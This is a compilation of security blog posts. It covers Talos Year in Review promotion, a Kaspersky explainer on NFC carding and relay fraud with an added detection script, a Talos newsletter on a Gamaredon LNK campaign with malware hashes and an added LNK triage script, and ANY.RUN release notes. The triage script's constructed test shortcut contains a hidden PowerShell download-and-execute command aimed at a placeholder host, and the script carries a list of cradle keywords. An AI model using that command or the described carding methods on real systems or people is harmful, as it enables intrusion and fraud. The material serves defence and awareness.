🎥 Talos Year in Review 2024: Part 1 & 2 – Watch Now!

Another year, another mountain of malicious telemetry to sift through. I spoke with a few of Talos’ Year in Review authors, freshly out of the sandbox, to discuss the how’s and why’s of our biggest findings.

👉 Part 1: The major theme of 2024, top vulnerabilities, email threats and adversary tooling

👉 Part 2: Ransomware groups, and why we’re seeing more identity attacks

Whether you’re here for the hard data or the dry humor, we’ve got you covered. We break down what mattered most in 2024 — and what’s on the radar for 2025.

Download Talos’ full 2024 Year in Review today.

Cisco Talos Blog – Read More

How to guard against NFC carding theft | Kaspersky official blog

Payment card security is constantly improving, but attackers keep finding new ways to steal money. In days gone by, having tricked the victim into handing over card credentials on a fake online store or through another scam, cybercriminals would make a physical duplicate card by writing the stolen data onto a magnetic stripe. Such cards could then be used in stores and even at ATMs without a hitch. The advent of chip cards and one-time passwords (OTPs) made life much harder for scammers, but they adapted. The shift to mobile payments using smartphones increased resilience against some types of scams — but also opened up new avenues for them. Now, having phished a card number, they try to link it to their own Apple Pay or Google Wallet account. That done, they use this account from a smartphone to pay for goods using the victim’s card — either in a regular store or at a fake outlet with an NFC-enabled payment terminal.

How card credentials are phished

Such cyberattacks entail preparation on an industrial scale. Attackers create networks of fake websites designed to phish for payment data. These might imitate delivery services, large online stores, and even portals for paying utility bills or traffic fines. The cybercriminals also buy up dozens of smartphones, create Apple or Google accounts on them, and install contactless payment apps.

Next comes the juicy bit. When a victim lands on a bait site, they’re asked to link their card or make a mandatory small payment. This requires entering their card details and confirming ownership of the card by entering an OTP. In fact, the card is not charged at this point.

What actually happens? The victim’s data is almost instantly transferred to the cybercriminals, who attempt to link the card to a mobile wallet on their smartphone. The OTP code is needed to authorize this operation. To speed up and simplify the process, the attackers use special software that takes the data supplied by the victim and generates an image of the card that replicates it perfectly; the wallet app’s card-scanning feature can then simply be pointed at that image instead of a physical card. The exact process of linking a card to a mobile wallet depends on the specific country and bank, but usually, no data is required other than the number, expiration date, cardholder name, CVV/CVC, and OTP. All this can be phished in a single session and put to use immediately.

To make attacks even more effective, cybercriminals employ additional tricks. First, if the victim comes to their senses before tapping the Submit button, any data already entered into the forms is still passed to the criminals — even if it’s just a few characters or an incomplete entry. Second, the fake site may report that the payment failed and prompt the victim to try a different card. This way, the criminals might phish details for two or three cards in one go.

The cards aren’t charged right away, and many people, seeing nothing suspicious on their bank statement, forget all about the incident.

How money is stolen from cards

Cybercriminals might link dozens of cards to one smartphone without immediately trying to spend money from them. This smartphone, stuffed with card numbers, is then resold on the dark web. Often, weeks or even months go by between the phishing and the spending. But when that unpleasant day eventually comes, the criminals might decide to splash out on luxury items in a physical store simply by making a contactless payment from a phone full of phished card numbers. Alternatively, they might set up their own fake store on a legitimate e-commerce platform and charge money for non-existent goods. Some countries even allow ATM withdrawals using an NFC-enabled smartphone. In all of the above cases, no confirmation of the transaction via PIN or OTP is required, so money can be siphoned off until the victim blocks the card.

To speed up transferring mobile wallets to clandestine buyers, as well as to reduce the risk for those making payments in stores, attackers have begun to use an NFC relay technique dubbed Ghost Tap. They start by installing a legitimate app such as NFCGate on two smartphones — one with the mobile wallet and stolen cards, the other used directly for payments. This app transmits, in real time over the internet, the NFC data of the wallet from the first phone to the NFC antenna of the second, which the cybercriminals’ accomplice (known as a “mule”) taps on the payment terminal.

Most terminals in physical stores and many ATMs are unable to tell the relayed signal from an original one, allowing the mule to easily pay for goods (or gift cards, which make it easier to launder the stolen funds). And if the mule is detained in the store, there is nothing incriminating on the smartphone, only the legitimate NFCGate app. No stolen card numbers are there, for these are tucked away on the smartphone of the mastermind behind the operation, who can be anywhere, even in another country. This method allows scammers to quickly and safely cash out large sums because there can be multiple mules paying almost simultaneously with the same stolen card.

How to lose money by tapping your card on your phone

In late 2024, fraudsters came up with another NFC relay scheme and successfully tested it on users from Russia, and there’s nothing to stop the operation from being scaled up worldwide. In this scheme, victims aren’t even asked for their card credentials. Instead, the attackers socially engineer them into installing a supposedly handy app on their smartphone under the guise of a government, banking, or other service. Since many such banking and government apps in Russia were removed from official stores due to sanctions, unsuspecting users readily agree to install them. The victim is then prompted to hold their card to their smartphone and enter their PIN for “authorization” or “verification” purposes.

As you might have guessed, the installed app has nothing in common with its description. In the first wave of such attacks, what victims received was the same NFC relay, repackaged as a “handy app”. It read the card when held to the smartphone, and transmitted its data along with the PIN to the attackers, who used it to make purchases or withdraw cash from NFC-enabled ATMs. Anti-fraud systems of major Russian banks quickly learned to identify such payments due to mismatches in the victim’s and the payer’s geolocation, so in 2025 the scheme — but not the essence — changed.

Now, the victim receives an app for creating a duplicate card, and the relay is installed on the attackers’ side. Next, under the bogus pretext of the risk of theft, the victim is persuaded to deposit money into a “safe account” through an ATM, using their smartphone to authorize the payment. When the victim holds their phone to the ATM, the scammer relays their own card details to it, and the money ends up in their account. Such operations are hard to track for automatic anti-fraud systems since the transaction looks perfectly legitimate — someone walked up to an ATM and deposited cash onto a card. The anti-fraud system doesn’t know that the card belonged to someone else.
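The post names three signals that bank anti-fraud systems lean on: many cards being linked to one phone, a payer far from where the bank last saw the cardholder, and one relayed card being tapped by several mules almost at once. The following is an added example, not Kaspersky’s code or any bank’s actual rules: it runs those three heuristics over constructed provisioning and payment events. The locations, thresholds, and card and device identifiers are all made up, and the cardholder’s last known location is assumed to come from the holder’s own banking-app session.

```python
import math
from collections import defaultdict
from datetime import datetime, timedelta


def haversine_km(a, b):
    """Great-circle distance in km between two (lat, lon) points."""
    lat1, lon1, lat2, lon2 = map(math.radians, (*a, *b))
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * 6371.0 * math.asin(math.sqrt(h))


def ts(s):
    return datetime.fromisoformat(s)


# Constructed events, not bank data. dev-A is the "phone full of phished cards" from the post.
PROVISIONING = [{"device": "dev-A", "card": f"card-{i:02d}", "t": ts(f"2025-03-01T10:{i:02d}:00")}
                for i in range(6)]
PROVISIONING.append({"device": "dev-B", "card": "card-90", "t": ts("2025-03-01T12:00:00")})

# Where the bank last saw each cardholder (assumed to come from the holder's banking-app session).
HOLDER_LOCATION = {"card-00": (55.75, 37.62), "card-01": (55.75, 37.62), "card-90": (48.86, 2.35)}

# Contactless payments: card, terminal, terminal location, time (constructed).
PAYMENTS = [
    {"card": "card-01", "terminal": "pos-1", "loc": (59.93, 30.32), "t": ts("2025-03-05T14:00:00")},
    {"card": "card-01", "terminal": "pos-2", "loc": (55.75, 37.62), "t": ts("2025-03-05T14:03:00")},
    {"card": "card-00", "terminal": "pos-3", "loc": (40.71, -74.01), "t": ts("2025-03-05T15:00:00")},
    {"card": "card-90", "terminal": "pos-4", "loc": (48.87, 2.36), "t": ts("2025-03-05T16:00:00")},
]


def provisioning_velocity(events, max_cards=3, window=timedelta(hours=1)):
    """One device linking more than max_cards distinct cards inside a single window."""
    alerts = []
    by_device = defaultdict(list)
    for e in sorted(events, key=lambda e: e["t"]):
        by_device[e["device"]].append(e)
    for device, evs in by_device.items():
        for i, first in enumerate(evs):
            cards = {x["card"] for x in evs[i:] if x["t"] - first["t"] <= window}
            if len(cards) > max_cards:
                alerts.append({"rule": "provisioning-velocity", "device": device, "cards": len(cards)})
                break
    return alerts


def holder_distance(payments, holder_loc, max_km=300):
    """Payer far from where the bank last saw the cardholder (the mismatch the post describes)."""
    alerts = []
    for p in payments:
        home = holder_loc.get(p["card"])
        if home is None:
            continue
        km = haversine_km(home, p["loc"])
        if km > max_km:
            alerts.append({"rule": "holder-distance", "card": p["card"],
                           "terminal": p["terminal"], "km": round(km)})
    return alerts


def impossible_travel(payments, max_kmh=900):
    """Same card at two terminals faster than anyone could travel: several mules, one relayed card."""
    alerts = []
    by_card = defaultdict(list)
    for p in sorted(payments, key=lambda p: p["t"]):
        by_card[p["card"]].append(p)
    for card, ps in by_card.items():
        for prev, cur in zip(ps, ps[1:]):
            km = haversine_km(prev["loc"], cur["loc"])
            hours = (cur["t"] - prev["t"]).total_seconds() / 3600
            if km > 1 and (hours == 0 or km / hours > max_kmh):
                alerts.append({"rule": "impossible-travel", "card": card,
                               "terminals": (prev["terminal"], cur["terminal"]), "km": round(km)})
    return alerts


def run_all():
    """Apply all three heuristics to the constructed events."""
    return (provisioning_velocity(PROVISIONING)
            + holder_distance(PAYMENTS, HOLDER_LOCATION)
            + impossible_travel(PAYMENTS))


if __name__ == "__main__":
    for alert in run_all():
        print(alert)
```

Note that the last scheme in the post (the victim depositing cash onto a relayed card at an ATM) defeats all three checks, as the text says: the holder, the phone and the terminal are all in the same place, and only one card is involved.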

How to protect your cards from scammers

First of all, Google and Apple themselves, together with payment systems, should implement additional protective measures in the payment infrastructure. However, users can also take steps to protect themselves:

  • Use virtual cards for online payments. Don’t keep large amounts of money on them, and only top up just before making an online purchase. If your card issuer allows it, disable offline payments and cash withdrawals from such cards.
  • Get a new virtual card and block your old one at least once a year.
  • For offline payments, link a different card to Apple Pay, Google Wallet, or a similar service. Never use this card online, and if possible, use a mobile wallet on your smartphone when paying in stores.
  • Be very wary of apps asking you to hold your payment card to your smartphone, let alone enter your PIN. If it’s a long-trusted banking app, then okay; but if it’s something dodgy you only just installed from an obscure link outside an official app store, steer clear.
  • Use plastic cards at ATMs, not an NFC-enabled smartphone.
  • Install a comprehensive security solution on all computers and smartphones to minimize the risk of landing on phishing sites and installing malicious apps.
  • Enable the Safe Money component, available in all our security solutions, to protect financial transactions and online purchases.
  • Activate the fastest possible transaction notifications (text and push) for all payment cards, and contact your bank or issuer immediately if you notice anything suspicious.

Want to learn more about how scammers can steal money from your cards? Read our posts:

Kaspersky official blog – Read More

One mighty fine-looking report


Welcome to this week’s edition of the Threat Source newsletter. 

They say art is subjective, but have you ever seen a well-formatted bar chart? Van Gogh had Starry Night, but Talos’ 2024 Year in Review (available now!) has color-coded data with perfect labels. True beauty. 

If you haven’t yet had a chance to fully digest this gorgeous report (massive shout-out to our creative team), here are some links. Clicking on them may not change your life, but what if it does? Only one way to find out: 

Our Year in Review landing page houses all our Year in Review content, from videos to podcasts and topic summaries. There’s more content coming out every week this month. Oh, you can also download the report itself here, which is useful. 

Here’s a two-minute animated overview. Watch those bad boy bar charts come to life. 

The TTP: Year in Review Special (Part 1) is inspired by The Last of Us in more ways than you might think. We have a two-part video interview with the report’s authors, featuring me calling cybercriminals “cheeky f*****s.” Part 2 is coming out tomorrow, April 4th.

This Beers with Talos B team episode genuinely caused someone to direct message me, citing their spouse’s concerns about their laughter levels when listening (“Are you okay?”). 

A couple of the report’s top findings: 

  • Ransomware actors overwhelmingly leveraged valid accounts for initial access in 2024, with this tactic appearing in almost 70 percent of Cisco Talos Incident Response cases. 
  • Operators endeavored to disable targets’ security solutions in most of the Talos IR cases we observed, almost always succeeding. 
  • Some of the top-targeted network vulnerabilities affect end-of-life (EOL) devices and therefore have no available patches, despite still being actively targeted by threat actors.

The one big thing 

Cisco Talos is actively tracking an ongoing campaign targeting users in Ukraine with malicious LNK files, which run a PowerShell downloader. The file names use Russian words related to the movement of troops in Ukraine as a lure. Talos assesses with medium confidence that this activity is associated with the Gamaredon threat actor group. 

Why do I care? 

The invasion of Ukraine is a common theme used by the Gamaredon group in their phishing campaigns and this campaign continues the use of this technique. The actor distributes LNK files compressed inside ZIP archives, usually disguising the file as an Office document and using names that are related to the invasion. 

So now what? 

Ways our customers can detect and block this threat are listed in this dedicated blog post.
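The Talos post linked above carries the vendor-side detections. As an added example (not Talos code), here is a small triage script for the file shape the item describes: a ZIP carrying a .lnk that poses as an Office document and launches a PowerShell downloader. It parses the parts of the Windows Shell Link (MS-SHLLINK) format that reveal what a shortcut actually runs: the header flags, ShowCommand, and the string-data fields holding the target path and command-line arguments. The sample ZIP, file names and URL are constructed for the demo; they are not indicators from the campaign.

```python
import io
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]  # in file order
SW_SHOWMINNOACTIVE = 7
SUSPICIOUS = ("powershell", "pwsh", "-enc", "-encodedcommand", "iex", "invoke-expression",
              "downloadstring", "downloadfile", "-w hidden", "-windowstyle hidden", "bypass",
              "mshta", "cmd.exe /c")
DOC_EXTS = (".doc", ".docx", ".xls", ".xlsx", ".pdf", ".rtf")


def parse_lnk(data: bytes) -> dict:
    """Parse the header and string-data sections of a Windows shortcut."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 0x4C
    if flags & HAS_ID_LIST:            # skip LinkTargetIDList: 2-byte size, then the items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:          # skip LinkInfo: its size field includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    for bit, field in STRING_FIELDS:   # each: 2-byte character count, then the characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if unicode else count
        info[field] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252", "replace")
        pos += nbytes
    return info


def assess(info: dict) -> list:
    """Reasons a parsed shortcut looks like a download cradle rather than a document."""
    cmd = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    reasons = [f"command line contains {t!r}" for t in SUSPICIOUS if t in cmd]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (window minimised on launch)")
    return reasons


def scan_zip(zip_bytes: bytes) -> list:
    """Report every .lnk inside a ZIP, including the double-extension 'document' disguise."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for member in zf.namelist():
            if not member.lower().endswith(".lnk"):
                continue
            info = parse_lnk(zf.read(member))
            reasons = assess(info)
            if member[:-4].lower().endswith(DOC_EXTS):
                reasons.append("document extension in front of .lnk")
            findings.append({"member": member, "target": info.get("relative_path", ""),
                             "arguments": info.get("arguments", ""), "reasons": reasons})
    return findings


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Build a minimal Unicode shortcut (header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS); test input only."""
    flags = IS_UNICODE | 0x08 | 0x20
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def field(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + field(relative_path) + field(arguments)


def make_sample_zip() -> bytes:
    """Constructed lure: a shortcut named like a Word file that runs a PowerShell cradle (placeholder URL)."""
    lnk = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    "-w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage.ps1')\"",
                    show_command=SW_SHOWMINNOACTIVE)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.docx.lnk", lnk)
        zf.writestr("notes.txt", "nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(make_sample_zip()):
        print(f["member"], "->", f["target"], f["arguments"])
        for r in f["reasons"]:
            print("  -", r)
```

Real lures usually also carry a LinkTargetIDList and LinkInfo; the parser skips both by their size fields, so the string data is found at the right offset either way.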

Top security headlines of the week

Gootloader Malware Resurfaces in Google Ads for Legal Docs: Attackers target law professionals by hiding the infostealer in ads delivered via Google-based malvertising. (Dark Reading)

UK threatens £100K-a-day fines under new cyber bill: The tech secretary revealed the landmark legislation’s full details for the first time. (The Register)

Hacker linked to Oracle Cloud intrusion threatens to sell stolen data: The alleged breach was linked to a critical vulnerability. (Cybersecurity Dive)

WordPress attackers hide malware in overlooked plugins directory: The Must-Use plugins (mu-plugins) directory is used to store essential plugins that are necessary for a site to run properly. (SC Magazine)

Can’t get enough Talos? 

I mean, bless you if that’s the case, because the Year in Review links in the opening section are probably enough to keep you going. But if you’re still thirsty for more, here’s what the press have been making of the Year in Review findings: 

Upcoming events where you can find Talos

Most prevalent malware files from Talos telemetry over the past week  

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
Typical Filename: VID001.exe
Detection Name: Simple_Custom_Detection

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
VirusTotal: https://www.virustotal.com/gui/file/5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca
MD5: 71fea034b422e4a17ebb06022532fdde
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Coinminer:MBT.26mw.in14.Talos

Cisco Talos Blog – Read More

Release Notes: Android VM, Pre-Installed Dev Tools, TI Reports & Enhanced Detection

March was a productive and exciting month for the ANY.RUN team. We’ve been working hard to improve both our sandbox platform and Threat Intelligence services — all to help you detect threats faster and stay ahead of cybercriminals. 

This month, we focused on expanding the environments available for malware analysis and making our threat detection even sharper. We also published fresh TI reports and introduced new signatures and rules to improve detection accuracy. 

Let’s take a quick tour of what’s new in ANY.RUN

Product Updates 

Android Environment Now Available for Sandbox Analysis 

It’s official! The update many security teams have been waiting for is here: ANY.RUN now offers Android OS in the Interactive Sandbox.

You can now investigate Android malware in a real ARM-based sandbox and see exactly how a suspicious APK file behaves in a mobile environment. This means no more guessing, no more blind spots, and no need for separate mobile analysis tools. 

Read technical analysis of Salvador Stealer, a new Android banking malware

Coper analyzed inside ANY.RUN Android environment 

With this release, SOC teams, incident responders, and threat hunters can analyze Android threats faster and with greater accuracy, all within the familiar ANY.RUN interface. 

And here’s the best part: Android OS support is available to all users, including Free Plan users. 

Why it matters: 

  • It’s fast: No waiting for static scans or time-consuming reverse engineering.  
  • It’s interactive: Click, explore, and engage with the malware just like on a real Android device. Grant or deny permissions, trigger actions, and watch how the sample reacts. 
  • It’s detailed: Track every move the malware makes with process trees, MITRE ATT&CK mapping, and real-time network insights. 
  • It’s fully cloud-based: No extra setup required. Run Android malware investigations anytime, anywhere, directly in your browser. 
  • It’s built for teams: Generate structured reports, share findings, and collaborate efficiently across your security team. 

This update makes Android malware analysis easier, faster, and more accessible to everyone. 


New Pre-Installed Development Tools for Deep Malware Analysis 

We’ve introduced a new pre-installed software set in the Windows 10 VMs: the Development Toolkit, designed specifically for advanced malware analysis. 

With this update, users can now select the “Development” option when configuring their sandbox environment. This toolkit includes essential software like Python, Node.js, debuggers, decompilers, and reverse engineering tools, pre-installed and ready to use.  

It’s ideal for analyzing complex threats like Python-based malware, Node.js-based samples, or malware that requires deeper debugging and inspection. 

Pre-installed software set for deeper malware analysis 

What’s inside the Development Toolkit? 

  • Python (latest version) 
  • Node.js (latest version) 
  • DebugView 
  • Detect It Easy (DiE) 
  • dnSpy 
  • HxD Hex Editor 
  • Process Hacker 
  • x64dbg Debugger 
  • Wireshark PE 

This set removes the need to manually install research tools, making your analysis sessions faster, smoother, and more efficient. 

Threat Coverage Updates 

We’ve also boosted our threat detection and intelligence capabilities for more precise analysis. 

Suricata Rules 

In March, we expanded our network-based threat detection by adding 1,654 new Suricata rules. These rules enhance visibility over malicious domains, C2 infrastructure, and phishing campaigns. 

Key updates include: 

  • Identification of 2 domains associated with Pentagon-related infrastructure. 

New Behavior Signatures 

In March, we added a total of 64 new behavior-based detection signatures to improve malware visibility and detection accuracy. These signatures cover mutex findings, suspicious activity patterns, C2 communications, and detections for popular malware families. 

Highlights from this update include: 

  • VANHELSING malware 
  • Wormlocker 
  • ScreenConnect abuse 
  • Advanced Installer misuse 
  • HatVibe malware 
  • VANHELSING detection (additional session) 
  • GRANDOREIRO banking trojan 
  • SVCSTEALER mutex detection 
  • DINODASRAT detection 
  • MINSTLOADER detection (script-based) 

Additionally, behavior signatures were introduced to detect: 

  • C2 communications related to Pentagon infrastructure (requires MITM analysis) 
  • HTTP requests linked to Sneaky2FA phishing activity 
  • domains spoofing e-zpass 
  • suspicious activity and evasion techniques 

New YARA Rule Updates 

To further strengthen static detection and classification, we added 5 new YARA rules in March. These rules improve the identification of emerging malware families and suspicious behavior patterns. 

New TI Reports Published 

TI Reports get you up to speed on the latest cyber threats targeting businesses

In March, we expanded our Threat Intelligence library with three new reports covering the latest activity of active APT groups. These reports provide valuable insights into real-world attacks, tools, and indicators to help security teams detect and respond to emerging threats. 

Here’s what’s new: 

  • Salt Typhoon Attacks: An in-depth report on a Chinese state-sponsored cyber espionage group active since 2019. The report highlights the group’s long-term, covert operations targeting government entities, critical infrastructure, and telecommunications providers across Southeast Asia, North America, and Africa. 
  • Dark Caracal Attacks: A collection of IOCs and malware samples linked to Dark Caracal, a threat actor known for global cyber-espionage campaigns. The report focuses on recent activities, targeted sectors, and indicators to help identify similar threats. 
  • UAC-0063 Attacks: A detailed analysis of UAC-0063, an APT group known for persistent and targeted attacks. The report includes IOCs, malware samples, YARA, and SIGMA rules to help defenders spot related malicious activity. 


About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

The post Release Notes: Android VM, Pre-Installed Dev Tools, TI Reports & Enhanced Detection appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – Read More